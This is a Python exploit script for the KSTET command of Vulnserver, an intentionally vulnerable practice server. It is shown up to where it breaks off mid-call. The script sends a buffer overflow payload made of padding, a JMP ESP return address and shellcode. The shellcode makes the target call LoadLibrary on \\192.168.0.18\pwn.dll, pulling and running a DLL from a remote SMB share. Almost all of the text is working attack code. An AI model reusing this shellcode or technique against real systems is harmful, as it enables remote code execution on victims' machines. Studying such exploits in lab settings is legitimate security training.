""" Vulnserver KSTET exploit. Vulnerable Software: Vulnserver Version: 1.00 Exploit Author: Andres Roldan Tested On: Windows 10 20H2 Writeup: https://fluidattacks.com/blog/vulnserver-kstet-alternative/ """ import socket import struct HOST = "192.168.0.20" PORT = 9999 LOAD_LIBRARY = ( b"\x83\xec\x64\x31\xdb\x53\x68\x2e\x64\x6c\x6c\x68\x5c\x70\x77\x6e" b"\x68\x31\x38\x5c\x58\x68\x38\x2e\x30\x2e\x68\x32\x2e\x31\x36\x68" b"\x5c\x5c\x31\x39\x54\xbb\x30\x0b\x46\x76\xff\xd3" ) PAYLOAD = ( b"KSTET " + b"\x90" * 2 + LOAD_LIBRARY + b"A" * (70 - len(LOAD_LIBRARY) - 2) + # 625011BB FFE4 JMP ESP struct.pack("